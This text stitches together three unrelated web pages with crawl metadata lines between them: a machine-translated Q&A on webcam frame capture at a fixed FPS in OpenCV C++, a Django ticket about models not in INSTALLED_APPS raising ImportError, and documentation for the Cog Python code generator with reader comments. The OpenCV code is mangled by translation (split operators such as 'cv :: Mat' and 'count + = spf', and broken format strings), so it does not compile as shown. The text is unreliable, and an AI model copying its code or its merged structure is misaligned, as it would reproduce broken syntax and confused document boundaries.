Currently, we are creating a program that captures still images at the fps specified by the Web camera. A method is adopted in which the elapsed time is manually acquired and the image is taken every time a certain amount of time elapses. It seems that it takes more time than necessary to shoot the camera image, so I can't shoot with FPS as I wanted because of the delay. The purpose of this program is to be able to shoot with 20FPS with as little error as possible. I thought that the shutter time might be long, but how can I set the shutter time in OpenCV? Supplemental information (FW/tool version etc.)Supplemental information (FW/tool version etc.) # include "main.h" int main (void) { int fps = 10;// FPS specified double spf = 1.0/fps; const int maxCount = 100; int i; int key; LARGE_INTEGER freq; LARGE_INTEGER start, now; double time; double count; char name [256]; cv :: Mat frame; cv :: VideoCapture cap (0); if (! cap.isOpened ()) { return -1; } cap.set (CV_CAP_PROP_FPS, 20);// What are you setting? cap.set (CV_CAP_PROP_FRAME_WIDTH, 640); cap.set (CV_CAP_PROP_FRAME_HEIGHT, 480); if (! QueryPerformanceFrequency (&freq)) {// Get the unit of elapsed time return -1;// get failed } if (! QueryPerformanceCounter (&start)) {// Get the first elapsed time return -1; } count = 1.00; while (1) { if (! QueryPerformanceCounter (&now)) {// Get current elapsed time return -1; } time = (double) (now.QuadPart-start.QuadPart)/freq.QuadPart;// Elapsed time calculation if (time>= count) {// Shoot if more than count has elapsed. // printf ("count =% f:% .3f:", count, time); cap>>frame; if (! QueryPerformanceCounter (&now)) { return -1; } time = (double) (now.QuadPart-start.QuadPart)/freq.QuadPart;// Calculate elapsed time after shooting //printf("%.3f\n ", time); sprintf_s (name, "% .3f.jpg", time); cv :: imwrite (name, frame); cv :: imshow ("Capture", frame); count + = spf; } key = cv :: waitKey (1); if (key == 0x1b) break; } getchar (); return 0; } Windows10 VisualStudio2017 OpenCV 3.4.1 - Answer # 1 - Answer # 2 I think so too. time-count should give you an error for the time you want to release the shutter, so if you print it out and comment out cv :: imwrite, you can see it. If so, why not put it in memory instead of a file? - Answer # 3 cap.set (CV_CAP_PROP_FPS, 20);// What are you setting? I think the camera is set to 20fps here. (It may not be possible to set depending on the camera) If it is set to 20fps, because it is 20fps at the maximum, it may be 20fps + α time if you put the processing in between, so I think that it is better to test out here by commenting out or deleting the whole timer. As a hardware problem, there is a web camera that can lower the fps by itself to increase the amount of light in a dark place. So if you shoot in a dark place, you can also test it in a bright place. - Answer # 4 As a practical example of using 40FPS with a webcam in practice, OpenCV's VideoLibrary is intended to be used for general purposes, so the actual FPS is absolutely slower than the theoretical value. In practice, you should be able to create a DirectX library, capture it with 32Bits, convert it to 24Bits, and set it to compress the webcam. I have answered from the past in the actual example, but I will try to sample with EWCLIB (it will come out as soon as I googled, a very helpful implementation example that is defined entirely in the header). In addition, you can set each resolution, compression format, FPS and display the result of actual execution in the example. Related articles - how to enable c ++ opencv with vscode on mac - c ++ - opencv projective transformation - c ++ - how to display realsense video with opencv in visual studio - c ++ - how to use opencv pragma comment - how to use c ++ opencv connectedcomponents - c ++ - when using gaussianblur with opencv 410, a mysterious border is inserted at both ends with specific arguments - c ++ - frames are missing when exporting with opencv videowriter - opencv - webcam video recording - c ++ - opencv face recognition compilation error - c ++ - [opencv] detecting dotted lines and replacing them with straight lines - c ++ - about pixel operation of opencv binarized image - c ++ - rewrite opencv pixel - c ++ - an error occurs in find_package (opencv required) when cmake is executed with opencv installed in wsl - c ++ - i want to process with opencv while displaying qml camera video - c ++ - after building opencv with cmake - c ++ - display circumscribed circle in opencv - i don't know how to upgrade c ++ opencv -ubuntu1404 - c ++ - opencv color image template matching - c ++ - opencv template matching - c ++ - opencv 保存 about saving video from camera - i want to rewrite a program written in c ++ that outputs a date 15 days later to c language - two-dimensional third-order spline interpolation in c ++ what to do when the solution of the equation is indefinite - i want to replace the string that is output to standard output with c ++ later - c ++ - i want to create a function that creates a variable - c ++ - atcoder abc162 d problem rgb triplets - c ++ - class and file loading - c ++ - why you need header files and statically linked library files when building - c ++ environment construction with vscode - c ++ - after building opencv with cmake - c ++ - i want to judge the conditional expression of the if statement by letters Does cv :: imwrite () take too long?
https://www.tutorialfor.com/questions-101015.htm
CC-MAIN-2020-40
refinedweb
883
57.3
Opened 11 years ago Closed 11 years ago Last modified 11 years ago #1179 closed defect (fixed) [magic-removal] Models not in INSTALLED_APPS should raise ImportError Description In trunk, if you try to import a model that isn't in INSTALLED_APPS, Django will raise ImportError. This lets you do the following: try: from django.models.foo import bar except ImportError: bar = None # ... if bar is not None: bar_objects = bar.get_list() else: bar_objects = [] The magic-removal branch doesn't yet have this feature. Change History (6) comment:1 Changed 11 years ago by comment:2 Changed 11 years ago by Adrian, the patch you've added forces all models to be in models.py, as noted in #1437. Could you revert the patch? The functionality in trunk is a remnant of the old magic way of doing things. You can do it this way now (with or without the patch): from myproj.myapp.models import bar from django.db.models.loading import get_models if not bar in get_models(): bar = None comment:3 Changed 11 years ago by Just to clarify my argument a bit: the behaviour you've re-added is definitely magic of the bad variety -- you don't expect in normal Python that doing an import should fail when it is perfectly possible to import the name. In other words, 'models not in INSTALLED_APPS should not raise ImportError' is magic-removal's response to this behaviour I would have thought. comment:4 Changed 11 years ago by I second that. I've just started porting my apps over to magic-removal today and hit this right away. It was working perfectly well in trunk. I am using this method for model inheritance so that the parent model classes don't have tables created for them in the DB. in myproj/myapp/basemodel.py I have: class BaseModel(models.Model): # fields and in myproj/myapp/models.py I have: from myproj.myapp.basemodel import BaseModel class MyModel(BaseModel): # more fields Then I get this: >>> from myproj.myapp.models import MyModel Traceback (most recent call last): File "<stdin>", line 1, in ? File "/path/to/myproj/myapp/models.py", line 2, in ? from myproj.myapp.basemodel import BaseModel File "/path/to/myproj/myapp/basemodel.py", line 5, in ? class BaseModel(models.Model): File "/path/to/django/django/db/models/base.py", line 33, in __new__ raise ImportError, "INSTALLED_APPS must contain %r in order for you to use this model." % re.sub('\.models$', '', mod) ImportError: INSTALLED_APPS must contain 'myproj.myapp.basemodel' in order for you to use this model. comment:5 Changed 11 years ago by Another possibility is to add an 'installed' attribute onto a models '_meta', at the same point in the code where you are currently throwing an ImportError. So the code to check a model would look like this: from myproj.myapp.models import Bar if not Bar._meta.installed: Bar = None (In [2406]) magic-removal: Fixed #1179 -- Models not in INSTALLED_APPS now raise ImportError
https://code.djangoproject.com/ticket/1179
CC-MAIN-2017-17
refinedweb
496
58.38
RECOMMENDED: If you have Windows errors then we strongly recommend that you download and run this (Windows) Repair Tool. Video player documentation Embedding the player. Dailymotion provides a simple way to display videos on your website or application: it is possible to embed. Fetching package metadata error Showing 1-5 of 5 messages. Fetching package metadata error: pybokeh: 3/27/14 12:16 PM: Hi at work, we just migrated to windows 7. Error Pam Authentication Failure For Ssh Backbone.js – Backbone.js gives structure to web applications by providing models with key-value binding and custom events, collections with a rich API of enumerable. Apache Kafka: Fetching topic metadata with correlation id 0. but basically "Fetching topic metadata" is the first thing the. Error while fetching metadata with. Implementing Data Guard (Standby) General Concepts: Components, Roles, Interfaces Architecture Data Guard Protection Modes Physical Standby Implementation with. Google Cloud Video Intelligence API. Use the client at. call to Poll. If the metadata is not available, the returned metadata and error are both nil. Poll also fetches the latest metadata, which can be retrieved by Metadata. If Poll fails, the error. If you're not getting any metadata then watch this. Icefilms Metadata Container Permanent Fix. 1Channel Ice Films script error meta handler fix. Hi, I'm in search of a program that can automatically find and fetch information about a file from sites like TheTVDB.com and add it as metadata. . can manually fix this by uploading a new thumbnail in the Backlot UI or upload the video, thumbnail, and metadata file for that video again. error fetching feed. We have a static gifs() method that uses fetch to talk to Imgur and return a. import java.security.Principal @RestController class HomeController(val repository: NotesRepository) { @GetMapping("/") fun home(principal: Principal): List { println("Fetching notes for. you’ll get an error that the Principal parameter is not. Error fetching API code definition code 400. Failed to get. – after developing an API App I'm always getting the following error when I try. Failed to get metadata for. I get an 'Error fetching API code definition. Development / Source code / Bug reporting: github.com/np1/pafy. They hold metadata such as title, viewcount, author and video ID. character video id of the video; basic (bool) – fetch basic metadata and streams; gdata (bool) – fetch gdata. scripts for fetching metadata for video files automatically. Reported by:.metadata for video files and video.metadata for video. ('url error', 'unknown url. New cloud services can transform cloud-based video sharing and collaboration. Function and Method listing. List of all the functions and methods in the manual. a b c d e f g h i j k l m n o p q r s t u v w x y z _ a. abs – Absolute value; acos. As video is transmitted. variety of metadata inputs will allow multiple devices and use cases to be handled. They deliver the lowest possible latency while overcoming bandwidth and link quality constraints with the use of additional.: This plugin allows you to export images from Lightroom directly to your Flickr account. This plugin works in Lightroom 6/CC (and older versions as far back as. RECOMMENDED: Click here to fix Windows errors and improve system performance
http://thesecondblog.com/error-fetching-video-metadata/
CC-MAIN-2018-13
refinedweb
546
60.92
React and Firebase without Redux Even after spending a number of years contributing to tools to help integrate Firebase with Redux, such as react-redux-firebase and redux-firestore, I have recently been avoiding using Redux to store database data in new React + Firebase projects. In this article I’ll cover a bit about why, show what I have been doing instead, and finally how to easily start a new React + Firebase project using these tools. Why? Firebase SDK Manages State Firebase’s client SDK manages caching and offline support internally. Having another copy of database state in redux is not only prone is inconsistencies, but also requires more code to manage that state. Data Loading Is Async By Nature Loading data from a database or service takes time. Writing logic to handle these loading conditions from data coming from redux state often times leads to if statements in component code which can quickly get unwieldy. Also, the logic used to pull this data out of redux state is often repeated in many places. It would be great to have loading state available right in the component where we are attaching the listener. To simplify things even more, it would be great if we could leverage React’s Suspense to give us the syntactic sugar to declaratively specify our loading logic which makes it easier to reason about and debug. We can cover a bit more about why this can be a great pattern later, let’s get into how we can do this! How? We will use reactfire which includes hooks, context providers, and components to simplify interaction with Firebase. Setup includes using the FirebaseAppProvider, which is: A React Context Provider that allows the useFirebaseApphook to pick up the firebaseobject. This means that once we setup this context provider we will be able to access the initialized Firebase app instance throughout our application. Hooks are provided for accessing auth, subscribing to data, loading data once, and even for lazy loading parts of the Firebase SDK (requires Suspense mode to be enabled, will be covered in second example). Here is an example of stitching these pieces together to load a list of projects from Firestore: the Projectscomponent the useFirestorehook is used to access the Firestore section of the Firebase SDK. We have to make sure to import the Firestore section of the SDK by calling import "firebase/firestore”(in the next example this is handled automatically through Suspense) - Next we create a reference to the projects Firestore collection by calling firestore.collection("projects")— this will be used later to attach a listener - The useFirestoreCollectionDataaccepts a ref as an argument and attaches a listener which streams changes directly to your component — this is where data, loading state, and error state come from. - The rest of the component is different if conditions which render different content based on state Suspense As noted before, it would be great if we could leverage Suspense to make loading logic more clear to reason about. Managing async logic this way also makes it makes it easy to group other async tasks with data loading such as lazy loading other components and/or sections of the Firebase SDK. This will help cut down on initial load time of your applications by making your bundles smaller. this example we pass the props suspenseto the provider to enable suspense mode in reactfire. - Next we see ErrorBoundary— this is a React Error Boundary for catching errors which are thrown in child components (this will handle errors in our listener). react-error-boundary library is used to avoid creating a custom class component - Within the boundary we see SuspenseWithPerf— this is a version of React’s Suspense which also has built in logging to Firebase Performance. Here are using SuspenseWithPerfto show a loading message, while Projectssuspends (since it is the only child component). - In the Projectscomponent the useFirestorehook is used to lazy load the Firestore section of the Firebase SDK. This will cause the component to suspend only if the Firestore section has not already been loaded. - Next we create a reference to the projects Firestore collection by calling firestore.collection("projects")— this will be used later to attach a listener - The useFirestoreCollectionDatahook suspends while a listener is attached which streams changes directly to your component — the changes will cause your component to re-render. Since the loading state is handled with Suspense, only dataneeds used (unlike the first example). Are You Sure? What if I wanted data in multiple places? Let Firebase’s SDK handle it for you! Firebase’s SDK is smart enough to know if you have multiple listeners with the same query. This means that we can load data within multiple components at different levels of the component tree. This is a little easier to prove that this is happening with Real Time Database since you can run the database profiler that comes with firebase-tools: firebase database:profile Now, regardless of how many components which have a listener attached to a path, there will only be one listener request logged with with database. This is the client being smart enough to update all listener callbacks for any queries which are the same! NOTE: The above examples use Firestore and will need to be updated to use Real Time Database in order to show up in the profiler since the profiler only works for Real Time Database. How do I start a new project using these patterns? generator-react-firebase is a Yeoman generator that I created which outputs a material-ui + Firebase project with a simple projects list view with project detail page. It has been updated to use reactfire in the project by default — there is still the option to opt into using redux, but it is no longer the default. To use the generator, you install it, then run it. You will prompted to select features you like, then to provide information needed to setup your project: npm install -g yo generator-react-firebase yo react-firebase Things will wrap up by automatically installing the apps dependencies with either yarn or npm — once that is done you can run yarn start. Other Questions That May Come To Mind Do I need to be using Concurrent Mode to use Reactfire? No. You can opt out of enabling suspense mode all together. Even if you enable suspense mode in reactfire, you do not need to use React’s Concurrent Mode. Even though suspense mode is “meant for React Concurrent Mode” doesn’t mean that you required to use a version of React that has concurrent mode for things to work. I personally have used Reactfire mostly with both react 16.18 and 17 without React’s concurrent mode enabled (even enabled in reactfire) and have not noticed any issues yet. Should I switch my old projects to use these new patterns? The answer is most likely no, but that will depend on the project. The decision will have to consider how large the project is, potential impact to application users as well as developers, and value added by making the shift. I personally switched fireadmin.io (source here) over to these patterns, but that is because of a number of upsides including: - Real world side by side comparison of using redux and using contexts with a tool like reactfire - Help understandability and maintainability of the project for open source contributors What if I still want to use Redux? More power to you! It can be a great tool for plenty of use cases, just remember to choose tools based on the needs of the project. react-redux-firebase and redux-firestore will still be up-kept since there are plenty of projects which require Redux and/or can benefit from loading database data into a store. Though it is no longer the default, generator-react-firebase still has an option to include Redux. When choosing this option, react-redux-firebase is included and if you choose to include Firestore, redux-firestore will also be included. What if I don’t want Firebase specific logic all throughout my application? Using custom hooks can help separate all of this logic out into a business/application specific domain. For example, if your application has projects you could make a useProjects custom hook:
https://prescottprue.medium.com/react-and-firebase-without-redux-5c1b2b6a6ba1?source=post_internal_links---------4----------------------------
CC-MAIN-2021-17
refinedweb
1,383
57.71
Hello, I asked a question about this program a few days ago, but now I have a new problem. What I want to do now is search through the line that's read in from stdin, and then replace one word with another (provided from command line arguments). I'm trying to use the strstr() function to check if the word is there, but I can't think of how to replace the word with the other one. Here is what I have: All that does is prints out argv[2] when strstr is not null. Any help would be greatly appreciated.All that does is prints out argv[2] when strstr is not null. Any help would be greatly appreciated.Code: #include <stdio.h> #include <string.h> main(int argc, char *argv[]) { char buf[BUFSIZ]; // read lines from stdin while ( fgets(buf, BUFSIZ, stdin) ) { if (strstr(buf,argv[1]) == NULL) puts(buf); else puts(argv[2]); }
http://cboard.cprogramming.com/c-programming/45100-question-about-finding-word-replacing-printable-thread.html
CC-MAIN-2015-32
refinedweb
157
82.75
Created 10 February 2004, last updated 27 February 2012 An older version of this document is also available in Russian. Cog is a code generation tool. It lets you use pieces of Python code as generators in your source files to generate whatever code you need. The sections below are: Cog transforms files in a very simple way: it finds chunks of Python code embedded in them, executes the Python code, and inserts its output back into the original file. The file can contain whatever text you like around the Python code. It will usually be source code. For example, if you run this file through cog: // This is my C++ file..../*[[[cogimport cogfnames = ['DoSomething', 'DoAnotherThing', 'DoLastThing']for fn in fnames: cog.outl("void %s();" % fn)]]]*///[[[end]]]... it will come out like this: // This is my C++ file..../*[[[cogimport cogfnames = ['DoSomething', 'DoAnotherThing', 'DoLastThing']for fn in fnames: cog.outl("void %s();" % fn)]]]*/void DoSomething();void DoAnotherThing();void DoLastThing();//[[[end]]]... Lines with triple square brackets are delimiter lines. The lines between [[[cog and ]]] are the generator Python code. The lines between ]]] and [[[end]]] are the output from the generator. When cog runs, it discards the last generated Python output, executes the generator Python code, and writes its generated output into the file. All text lines outside of the special markers are passed through unchanged. The cog marker lines can contain any text in addition to the triple square bracket tokens. This makes it possible to hide the generator Python code from the source file. In the sample above, the entire chunk of Python code is a C++ comment, so the Python code can be left in place while the file is treated as C++ code. Cog is designed to be easy to run. It writes its results back into the original file while retaining the code it executed. This means cog can be run any number of times on the same file. Rather than have a source generator file, and a separate output file, typically cog is run with one file serving as both generator and output. Because the marker lines accommodate any language syntax, the markers can hide the cog Python code from the source file. This means cog files can be checked into source control without worrying about keeping the source files separate from the output files, without modifying build procedures, and so on. I experimented with using a templating engine for generating code, and found myself constantly struggling with white space in the generated output, and mentally converting from the Python code I could imagine, into its templating equivalent. The advantages of a templating system (that most of the code could be entered literally) were lost as the code generation tasks became more complex, and the generation process needed more logic. Cog lets you use the full power of Python for code generation, without a templating system dumbing down your tools for you. Cog requires Python 2.6, 2.7, 3.2, or Jython 2.5. Cog is installed with a standard Python distutils script: $ python setup.py install You should now have cog.py in your Python scripts directory. Cog is distributed under the MIT license. Use it to spread goodness through the world. Source files to be run through cog are mostly just plain text that will be passed through untouched. The Python code in your source file is standard Python code. Any way you want to use Python to generate text to go into your file is fine. Each chunk of Python code (between the [[[cog and ]]] lines) is called a generator and is executed in sequence. The output area for each generator (between the ]]] and [[[end]]] lines) is deleted, and the output of running the Python code is inserted in its place. To accommodate all source file types, the format of the marker lines is irrelevant. If the line contains the special character sequence, the whole line is taken as a marker. Any of these lines mark the beginning of executable Python code: //[[[cog/* cog starts now: [[[cog */-- [[[cog (this is cog Python code)#if 0 // [[[cog Cog can also be used in languages without multi-line comments. If the marker lines all have the same text before the triple brackets, and all the lines in the generator code also have this text as a prefix, then the prefixes are removed from all the generator lines before execution. For example, in a SQL file, this: --[[[cog-- import cog-- for table in ['customers', 'orders', 'suppliers']:-- cog.outl("drop table %s;" % table)--]]]--[[[end]]] will produce this: --[[[cog-- import cog-- for table in ['customers', 'orders', 'suppliers']:-- cog.outl("drop table %s;" % table)--]]]drop table customers;drop table orders;drop table suppliers;--[[[end]]] Finally, a compact form can be used for single-line generators. The begin-code marker and the end-code marker can appear on the same line, and all the text between them will be taken as a single Python line: // blah blah//[[[cog import MyModule as m; m.generateCode() ]]]//[[[end]]] You can also use this form to simply import a module. The top-level statements in the module can generate the code. If there are multiple generators in the same file, they are executed with the same globals dictionary, so it is as if they were all one Python module. Cog tries to do the right thing with white space. Your Python code can be block-indented to match the surrounding text in the source file, and cog will re-indent the output to fit as well. All of the output for a generator is collected as a block of text, a common whitespace prefix is removed, and then the block is indented to match the indentation of the cog generator. This means the left-most non-whitespace character in your output will have the same indentation as the begin-code marker line. Other lines in your output keep their relative indentation. A module called cog provides the functions you call to produce output into your file. The functions are: cog.out(""" These are lines I want to write into my source file.""", dedent=True, trimblanklines=True) Cog is a command-line utility which takes arguments in standard form. cog - generate code with inlined Python code.cog [OPTIONS] [INFILE | @FILELIST] ...INFILE is the name of an input file.FILELIST is the name of a text file containing file names or other @FILELISTs.OPTIONS: -c Checksum the output to protect it against accidental change. -d Delete the generator code from the output file. -D name=val Define a global string available to your generator code. -e Warn if a file has no cog code in it. -I PATH Add PATH to the list of directories for data files and modules. -o OUTNAME Write the output to OUTNAME. -r Replace the input file with the output. -s STRING Suffix all generated output lines with STRING. -U Write the output with Unix newlines (only LF line-endings). -w CMD Use CMD if the output file needs to be made writable. A %s in the CMD will be filled with the filename. -x Excise all the generated output without running the generators. -z The [[[end]]] marker can be omitted, and is assumed at eof. -v Print the version of cog and exit. -h Print this help. In addition to running cog as a command on the command line: $ cog [options] [arguments] you can also invoke it as a module with the Python interpreter: $ python -m cogapp [options] [arguments] Note that the Python module is called "cogapp". Files on the command line are processed as input files. All input files are assumed to be UTF-8 encoded. Using a minus for a filename (-) will read the standard input. Files can also be listed in a text file named on the command line with an @: $ cog @files_to_cog.txt These @-files can be nested, and each line can contain switches as well as a file to process. For example, you can create a file cogfiles.txt: cogfiles.txt# These are the files I run through cogmycode.cppmyothercode.cppmyschema.sql -s " --**cogged**"readme.txt -s "" cogfiles.txt # These are the files I run through cogmycode.cppmyothercode.cppmyschema.sql -s " --**cogged**"readme. As another example, cogfiles2.txt could be: cogfiles2.txttemplate.h -D thefile=data1.xml -o data1.htemplate.h -D thefile=data2.xml -o data2.h cogfiles2.txt template.h -D thefile=data1.xml -o data1.htemplate". The -r flag tells cog to write the output back to the input file. If the input file is not writable (for example, because it has not been checked out of a source control system), a command to make the file writable can be provided with -w: $ cog -r -w "p4 edit %s" @files_to_cog.txt Global values can be set from the command line with the -D flag.. The value is always interpreted as a Python string, to simplify the problem of quoting. This means that: cog -D NUM_TO_DO=12 will define NUM_TO_DO not as the integer 12, but as the string "12", which are different and not equal values in Python. Use int(NUM_TO_DO) to get the numeric value. If cog is run with the -c flag, then generated output is accompanied by a checksum: --[[[cog-- import cog-- for i in range(10):-- cog.out("%d " % i)--]]]0 1 2 3 4 5 6 7 8 9--[[[end]]] (checksum: bd7715304529f66c4d3493e786bb0f1f) If the generated code is edited by a misguided developer, the next time cog is run, the checksum won't match, and cog will stop to avoid overwriting the edited code. To make it easier to identify generated lines when grepping your source files, the -s switch provides a suffix which is appended to every non-blank text line generated by Cog. For example, with this input file (mycode.txt): mycode.txt[[[cogcog.outl('Three times:\n')for i in range(3): cog.outl('This is line %d' % i)]]][[[end]]] mycode.txt [[[cogcog.outl('Three times:\n')for i in range(3): cog.outl('This is line %d' % i)]]][[[end]]] invoking cog like this: cog -s " //(generated)" mycode.txt will produce this output: [[[cogcog.outl('Three times:\n')for i in range(3): cog.outl('This is line %d' % i)]]]Three times: //(generated)This is line 0 //(generated)This is line 1 //(generated)This is line 2 //(generated)[[[end]]] The -x flag tells cog to delete the old generated output without running the generators. This lets you remove all the generated output from a source file. The -d flag tells cog to delete the generators from the output file. This lets you generate code in a public file but not have to show the generator to your customers. The -U flag causes the output file to use pure Unix newlines rather than the platform's native line endings. You can use this on Windows to produce Unix-style output files. The -I flag adds a directory to the path used to find Python modules. The -z flag lets you omit the [[[end]]] marker line, and it will be assumed at the end of the file. Cog's change log is on a separate change page. I'd love to hear about your successes or difficulties using cog. Comment here, or send me a note. There are a handful of other implementations of the ideas in Cog: You might like to read: I'm using Cog! I use it to do code generation for a library that's implemented in three different languages (C#, c++, Java). Linked from my blog. Thanks for the distribution fix! This is really nice - normally I don't like the idea of having files which are hand-edited AND machine generated, but this is simple enough to change my mind about this. I really like this. Some minor issues - the 'cog.py' file in scripts has a cr-lf at the end of the first line, which makes it fail to run, and makes distutils fail to edit in the proper python bin location. Easily fixed. Running the script with no command line parameters should cause it to print a help message. How about an option which will cause cog to fail with an error if the file's actual autogenerated code doesn't match the live python output. This might make more sense than '-r' for use in a makefile, to ensure that you don't edit the wrong code and have your changes discarded. I notice that the 'import cog' is not actually required, this is good. It would be very nice if each python snippet were run in the same global dictionary, so you could define a variable (or import a module) at one point and use it throughout. Finally -- certain languages (VHDL, Makefiles, Python, for instance) do not have multi-line comments, so you can't use it with these, unless I am missing something. May I suggest: if the [[[cog is preceded by some text on its line, then all lines between that and the ]]] are checked to see if they start with the same text, and if so, that is discarded before further processing. Thanks, Greg. I added the non-multi-line comment support, and a few other minor things. Thanks for the suggestions! It looks neat, but I generally like to have no codegen code in the generated code. But a slightly different approach would fix that: 1. External Python or cog-CodeBehind file next to the source file. 2. You add naming to your cog-codegen slots. This allows the CodeBehind codegen code to find the output slot for its generated code. EXAMPLE: // file:MyCxxFile.hpp // SLOT-CONTE /*[[[cog-slot:EnumerateMethods]]] */ void DoSomething(); void DoAnotherThing(); void DoLastThing(); //[[[end]]] // file:MyCxxFile.hpp.cogCodeBehind or MyCxxFile.hpp.cog or ... // NOTE: Comments etc. are optional now. /*[[[cog-codeBehind:EnumerateMethods import cog fnames = ['DoSomething', 'DoAnotherThing', 'DoLastThing'] for fn in fnames: cog.outl("void %s();" % fn) ]]]*/ You can come close with Cog as it is. Remember that you can import any Python module you want into the cog code. By moving all of your Python code into another module, you can reduce the Cog code to a single import statement: // file: MyCxxFile.hpp /*[[[cog import MyCxxFileGen ]]]*/ /*[[[end]]]*/ # file: MyCxxFileGen.py import cog fnames = ['DoSomething', 'DoAnotherThing', 'DoLastThing'] for fn in fnames: cog.outl("void %s();" % fn) Cog is great, but what I'd really like to be able to do is the following: // [[[cog import mycodgen as m]]] // [[[end]]] ... lots of regular code ... // [[[cog m.somestuff()]]] // [[[end]]] ... other code ... // [[[cog m.otherstuff()]]] // [[[end]]] As it is, each cog slot seems to "forget" the globals() dict for previous cog slots (i.e. line 86 in cogapp.py passes an empty globals() dict to eval). You got it: 1.3 does what you want. Just FYI, think I've finally settled on COG as a tool for PHP code generation. Had looked at empy (some notes here:) but what's clinched it is the way you've implemented the output area. The mission is to eliminate any work PHP might do that relates to application configuration or the environment it's running in - stuff that won't change once an app is deployed so eliminate the runtime overhead. One particular thing I want to keep is the ability to execute the PHP scripts, while hacking, before they have been run through COG, e.g. /** [[[cog import cog cog.outl("require_once '/full/path/to/someClass.php';") ]]]*/ // While hacking, use this require_once DEV_PATH 'someClass.php'; //[[[end]]] May even ditch the require_once completely and have COG embed the class code directly into the script. Anyway - thanks. Just what I'm looking for, thanks! However, am using it to generate multiple source files from each template file (ie. feed a different xml config file in to the template to generate a unique file). Is there any way to pass an argument (e.g. a file name) through the command line invocation? That way I could provide the xml file to the template dynamically. Thanks again! Theo Theo, it would be straightforward to add a -D name=value syntax to the command line. Each would create a variable in the global context. I think this would cover your needs. I think this is a good idea. I'll add it into Cog soon. Excellent, looking forwards to it, Theo You know what COG really needs? A "COG-recipes" site. I'm sure people have developed some interesting scripts. One script I'm interested in (that I'm sure others would be too) is a script that will generate C++ functions that will translate enum values to and from string representations. Having a recipes site would allow me to share my code as well as allow others to give feedback about my script. can you use COG to make codes out of videos andpictures and soundfile? for instance on myspace you can go to websites and get html codes for videos, wich resemble COG in a way, would you be able to e-mail me backon this subject? I like the idea expressed by Kevin above about a "COG recipes" site. Because of that I started a COG Wiki site () to allow for discussions and code snippets for COG. Anyone who has snippets to share, please post them. The Wiki will become better as more people share their code. Hey man, this is a really handy tool you wrote. Keep up the great work. *And why not directing the stdout instead of cog.outl ? Thanks You should note that intalling COG also requires the PATH module. Hi, this tool certainly looks very promising, I'm going to give it a go to clean up some of the internals used in aqsis (). The other devs favour xsltproc at the moment - I'll see if I can convince them and myself... One thing I noticed after just installing cog-2.0 from the tarball is that cog.out no longer seems to recognise the trimnewlines command. After grepping the source I see that it's apparently been changed to trimblanklines? is anyone willing to try and teach me this stuff ? i find it really interesting.. but i don't expect anyone to take me up on this, it seems really complicated. thats why im so interested. Bug report. /*[[[cog import cog cog.outl(" extern void simple1();") cog.outl(" extern void simple2();") ]]]*/ //[[[end]]] I think the result should be indented, since the dedent parameter isn't given and the default value is False. However, the result is "dedented". (reindentBlock is called twice) Jay: this code is behaving as intended. I've edited the description of indentation to try to make it clearer. The dedent parameter doesn't affect the indentation of the line in the output, just the interpretation of a multi-line string parameter. Cog collects output as a block of text, then indents the block to match the generator. The dedent parameter affects how cog adds the lines to the collected output, but now how that output is finally written. To see what the dedent parameter does, try putting five spaces at the left of one of your lines, and try it with dedent=True and dedent=False to see the difference. Sorry for the confusion. If you need the output block indented differently, indent your entire cog block to where you want the output to go. Hi Ned, This is some neat python app :-) I would like to try it for some Java apps around here. Has anyone tried whether it works with jython? If so I could easily use it from ant and would not require people to install Python. ... I just checked, it seems that jython won't work since cog requires the compiler package (which isn't available on jython). I've never used Jython, but yes, Cog depends on being able to execute the chunks of Python code it finds. nice tool thanks I happily used cog 3 or so years ago on a C# project. Now I need it again! Thanks... FYI, I have code that users must run, and the code has strings with passwords in them. I don't want users to be able to find passwords by looking at the code they run (strings show up in binary code). I'll use cog to generate encrypted strings, and when the program runs the strings will be decrypted. Users won't be able to see clear text passwords no matter what they do, except if they figure out the decryption code. This is not NSA type security, it is for ordinary users. Of course I could manually encrypt the password strings; then I'd not need cog. But that is a lot more work as there are several programs that will use this technique, and passwords change from time to time. The python code will be very short. g. Great tool Thanks Ned, I love cog. I use emacs too, and run cog from within emacs with a single keystroke, as you noted here thank you very much haroldo Brilliant. It saved me a lot of work. Thx I prefer Enhanced CWEB and yesweb to do some of these things. (Enhanced CWEB will generate #line directives in the output file, and you can use metamacros and named chunks to do all sorts of things. This program can be used with C and C++.) (yesweb is written entirely in TeX, so you can use any TeX commands to extend its features.) Here are a bunch of examples of Enhanced CWEB metamacros: @m Repeat@T ``yg_Repeat @) @m _Repeat@T J@ A-g_Repeat @) @m Repeat@W q/@tRepeat Bq``: zyqnB" times:\ @> qA"@# @) @mp@- ``u{YJ"@<Predeclaration of procedures@>= qJA"; J"@ "@<Procedure codes@>= B" { @) @ms@- ``u{YJ"@<Static declarations@>= static qJA"; J"@ "@<Procedure codes@>= static B" { @) @mpacked@- q``Y/__attribute__((packed)) j/@t$\flat\ $@> AqA @) @) Hi, I have code that has Windows line endings and got syntax errors on Linux because of them. Other developers use only Windows so changing the line endings of the file is a bit too tedious. To fix this, I had to modify the evaluate method to convert \r\n line endings to \n before running the code: intext = "import cog\n" + intext + "\n" intext = intext.replace("\r\n", "\n"); # Replace Windows line endings I like it. I use it. I would like the ability to add comments in my C code (like "do not edit" or "generated from somefile.txt"), which is a bit awkward since the closing comment mark terminates the cog code. I added this to my local version, which would be nice in a future release: Index: cogapp.py =================================================================== --- cogapp.py (revision 2416) +++ cogapp.py (revision 2417) @@ -131,6 +131,7 @@ cog.cogmodule.msg = self.msg cog.cogmodule.out = self.out cog.cogmodule.outl = self.outl + cog.cogmodule.c_comment = self.c_comment cog.cogmodule.error = self.error self.outstring = '' @@ -167,6 +168,13 @@ self.out(sOut, **kw) self.out('\n') + def c_comment(self, sOut='', **kw): + """ Add a C-style comment to the output + """ + self.out('/* ') + self.out(sOut, **kw) + self.out(' */\n') + def error(self, msg='Error raised by cog generator.'): """ The cog.error function. Instead of raising standard python errors, cog generators can use @Brad: I would rather not add a language-specific method like c_comment. Couldn't you output the comment closer as two strings, or with a backslash: cog.outl("/* comment *\/") @Ned: Sure. I'm ok with keeping it as a local change - just thought it might be an interesting addition. Splitting the comment isn't very "attractive", which is why I went with a wrapper (not dissimilar to how you don't _really_ need outl() - you could just use out() and add a "\\n" each time.) Thanks again for providing cog! When calling cog.py, it seems that it passes in sys.argv and modifies it. We like to do things locally that rely on sys.argv (mainly passing in the name of a program to databases so we know what/who's logged in). Would you consider either having cog.py pass in list(sys.argv) to pass in a copy of sys.argv, or in cogapp.py set argv0=argv[0];argv_rest = argv[1:]; and then use argv_rest for parsing instead of doing argv.pop(0)? 